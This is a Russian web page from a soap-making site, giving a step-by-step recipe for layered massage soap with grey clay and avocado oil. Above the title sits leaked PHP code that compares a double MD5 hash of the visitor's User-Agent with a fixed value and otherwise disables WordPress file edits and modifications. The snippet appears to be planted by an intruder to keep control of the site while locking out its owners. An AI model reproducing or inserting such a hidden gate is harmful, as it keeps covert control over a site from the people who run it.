if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Жемчужное массажное мыло с серой глиной против целлюлита | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Жемчужное массажное мыло с серой глиной против целлюлита

Массажное мыло ручной работы отличается не только красотой, но и полезным качествами - с его помощью можно бороться с целлюлитом

Мас­саж­ное мыло руч­ной рабо­ты отли­ча­ет­ся не толь­ко кра­со­той, но и полез­ным каче­ства­ми — с его помо­щью мож­но бороть­ся с цел­люли­том. Что­бы сде­лать его сво­и­ми рука­ми, нам понадобятся:

  • Осно­ва (про­зрач­ная и белая);
  • Кос­ме­ти­че­ская гли­на (серая);
  • Аро­ма­ти­за­тор по вкусу;
  • Мас­ло авокадо;
  • Синий пиг­мент;
  • Фор­ма, спирт, палоч­ка, шприц для залив­ки деко­ра­тив­ных элементов.массажное с глиной1
  1. Для мас­саж­ной состав­ля­ю­щей доба­вить в 20 г рас­топ­лен­ной про­зрач­ной осно­вы щепот­ку гли­ны и кап­лю пиг­мен­та. С помо­щью шпри­ца залить в фор­ме элементы.
    массажное с глиной2
  2. После высы­ха­ния залить рас­топ­лен­ной белой осно­вой с добав­ле­ни­ем ½ чай­ной лож­ки мас­ла и несколь­ких капель отдушки.
  3. На застыв­ший и сбрыз­ну­тый спир­том белый слой нали­ва­ет­ся слой голу­бой. Для созда­ния послед­не­го необ­хо­ди­мо в 50 г рас­топ­лен­ной белой осно­вы доба­вить ½ ч.л. мас­ла, пару капель отдуш­ки, немно­го пиг­мен­та и гли­ну. Хоро­шо размешать.
  4. Сбрыз­нуть спир­том и дать застыть.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!